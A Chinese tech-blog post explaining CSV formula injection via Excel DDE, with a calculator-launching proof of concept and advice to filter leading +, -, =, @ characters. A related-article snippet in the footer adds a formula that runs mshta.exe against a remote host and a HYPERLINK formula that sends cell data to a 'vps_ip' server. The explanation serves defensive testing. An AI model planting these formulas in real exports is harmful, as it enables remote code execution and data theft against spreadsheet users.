CSV注入

最新推荐文章于 2024-04-17 08:26:50 发布
最新推荐文章于 2024-04-17 08:26:50 发布
阅读量536 收藏 9
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络安全 excel web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51175992/article/details/136683074
版权

背景:在做甲方的渗透测试的时候发现的一种漏洞:很多开发在做类似文件下载或导出的功能时没有控制用户的权限,也没有考虑到表格的输入需要进行过滤。因此导致了此类漏洞的产生

CSV简介

CSV(Comma Separated Values)是一种常见的文件格式,用于存储表格数据。它采用文本形式,将数据以逗号作为分隔符进行排列,通常每行表示一个数据记录,而逗号则用于分隔每个字段。

CSV文件通常由以下要素组成:

  • 行(Rows):每行代表一个数据记录
  • 列(Columns):每列代表数据记录中的一个字段
  • 字段(Fields):数据记录中的单个数据项
  • 分隔符(Delimiter):用于分隔字段的字符,通常是逗号(,),但也可以是其他字符,如制表符(tab)或分号(;
  • 引号(Quotes):可选,用于包裹字段

CSV文件的简单格式示例:

Name, Age, Gender
John, 25, Male
Alice, 30, Female
Bob, 28, Male

CSV注入原理

CSV注入是一种包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。

在excel中,如果单元格第一个字符是“+、-、@、=”这类的符号时,excel会将其作为一个表达式执行,如:

而“=”不止可以当作数据计算的符号,在DDE中也可执行外部应用

DDE

DDE(Dynamic Data Exchange)是一种在Microsoft Windows操作系统中用于应用程序间通信的机制。它允许应用程序之间在运行时共享数据,并通过发送和接收消息来实现交互。这意味着一个应用程序可以向另一个应用程序发送数据,然后后者可以动态地接收并使用这些数据,而且数据的变化会立即反映在接收方。这种特性为命令注入提供了可行性。

漏洞复现

创建一个excel表格,直接在单元格中输入payload:

=1 +cmd|'C calc'!A0

将其保存,注意:Excel现在的版本需要启用动态数据交换服务器启动

在【文件】->【选项】->【信任中心】->【信任中心设置】->【外部消息】

完成后,再次打开,计算器会自动跳出来

总结

这个漏洞其实影响非常大,在之前的案例中可以直接配合Flash的漏洞进行getshell,因此在实际开发过程中,表格内容不应该由用户控制,同时要对表格的输入内容做严格过滤,禁止首字母出现“+”,“-”,“=”,“@”。

muzzert
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【漏洞挖掘】——46、 CSV注入实践操作
Fly_鹏程万里
06-07 33
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1148
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
Webug(csv注入
weixin_40646615的博客
02-23 597
文章目录Webbug(csv注入CSV注入原理源代码漏洞利用总结 Webbug(csv注入CSV是(逗号分隔值)的英文缩写,通常都是纯文本文件。EXCEL表就可以存为CSV格式,可以用写字板之类工具打开。 CSV注入原理 创建一个CSV格式文件,使用Excel打开,当你输入一个公式,会被Excel自动运算并执行: eg:输入 =3+1,显示自动运算结果 而当你输入一个Excel本身不会存在的功能时,Excel就会被微软的另一种机制:DDE机制调用。 eg:输入 =cmd|’ /C calc’!.
[译]CSV 注入:被人低估的巨大风险
weixin_34198453的博客
10-22 275
原文地址:The Absurdly Underestimated Dangers of CSV Injection 原文作者:georgemauer 译文出自:掘金翻译计划 本文永久链接:github.com/xitu/gold-m… 译者:mnikn 校对者:yct21,CACppuccino 本文讲的是CSV 注入:被人低估的巨大...
csv命令注入示例1111111111111111
02-13
csv命令注入示例1111111111111111
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
10-26
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
VB读CSV到mysql_VB读取CSV到mysql_源码
09-30
可能需要使用参数化查询以防止SQL注入。 5. **事务处理**:为了确保数据的完整性和一致性,可能会使用数据库事务来批量处理数据插入。 6. **错误处理**:编写错误处理代码,捕获可能出现的问题,如网络中断、...
Shell脚本批量添加CSV数据到MySQL
07-23
2. SQL注入:在构建动态SQL语句时,避免SQL注入攻击,可以使用参数化查询或预编译语句。 3. 错误处理:在脚本中加入错误检查和处理机制,如捕获并记录执行失败的行。 4. 批量插入:为了提高性能,可以考虑使用批量...
java_cvs_解析
07-31
解析cvs
BurpSuite_payloads:与Burp Suite入侵者一起使用的有效载荷。 (最初在swisskeyrepo-PayloadsAllTheThings上找到)
04-15
BurpSuite_payloads 与Burp Suite入侵者一起使用的有效载荷(最初在swisskeyrepo-PayloadsAllTheThings上找到) 要在命令行中解压缩文件,请执行以下操作: tar xjf PayloadsAllTheThings.tar.bz2 -or- tar -xvjf PayloadsAllTheThings.tar.bz2 包括在有效载荷中: API密钥泄漏AWS Amazon Bucket S3 CORS配置错误CRLF注射CSRF注射CSV注入命令注入目录遍历文件包含GraphQL注射不安全的反序列化不安全的直接对象引用管理界面不安全安全的源代码管理JSON Web令牌Kubernetes LDAP注入乳胶注射方法与资源NoSQL注入OAuth 打开重定向比赛条件SAML注入SQL注入服务器端请求伪造服务器端模板注入类型杂耍上载不
decs:Diergo Easy CSV Streamable
03-22
由于这些工具没有直接的依赖关系,因此您可以通过创建新的lambda或功能接口并将其注入到映射和过滤器中来简单地扩展它以满足您的需要: BiConsumer< String> logger = (line, error) - > LoggerFactory ....
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4766
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
Web 安全CSV 注入攻击详解
最新发布
Innocence_0的博客
04-17 1123
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
csv注入文件
HoAd'blog
08-06 589
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
csv注入初探以及利用
Cwh的个人博客
02-28 3380
简介 之前进行渗透的时候经常会碰见csvexcel导入的功能。也思考过潜在安全隐患,今天刚好看到fb里面的一篇文章,fb上的介绍并不详细,对于其中的利用方式很感兴趣,基于此进行了一番学习。 fb链接 https://www.freebuf.com/vuls/195656.html 漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公...
安全测试 csv 注入
weixin_46202430的博客
03-09 362
csv 注入 用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0 =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这.
java中如何对CSV注入进行输入验证、输出过滤以及使用安全CSV解析库
06-09
在Java中,可以通过以下方式来对CSV注入进行输入验证、输出过滤以及使用安全CSV解析库: 1. 输入验证 在读取CSV数据之前,应该对用户输入进行验证,主要包括以下方面: - 数据类型:验证输入数据的类型是否正确,例如字符串、整数、浮点数等。 - 数据长度:验证输入数据的长度是否在合法范围内,例如限制字符串长度。 - 数据格式:验证输入数据的格式是否符合要求,例如日期格式、邮箱格式等。 - 特殊字符:验证输入数据中是否包含特殊字符,例如单引号、双引号、分号等。 可以使用Java自带的正则表达式库或者第三方库进行输入验证。 2. 输出过滤 在输出CSV数据之前,应该对数据进行过滤和转义,主要包括以下方面: - 特殊字符:对输出数据中的特殊字符进行转义,例如单引号、双引号、分号等。 - HTML标签:对输出数据中的HTML标签进行转义,以防止攻击者注入恶意代码。 - 敏感数据:对输出敏感数据进行模糊处理或者隐藏,以保障用户的隐私。 可以使用Java自带的字符串处理函数或者第三方库进行输出过滤和转义。 3. 使用安全CSV解析库 在Java中,可以使用一些开源的CSV解析库,例如Apache Commons CSV、OpenCSV等,这些库提供了安全可靠的CSV解析功能,并且自动进行输入验证和输出过滤,避免了手动处理数据带来的不安全因素。 使用这些库时,应该注意版本更新,及时更新到最新版本,以保障系统的安全性。 综上所述,对CSV注入进行输入验证、输出过滤以及使用安全CSV解析库是保障系统安全的重要措施,开发人员应该注重安全性,保障用户数据的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值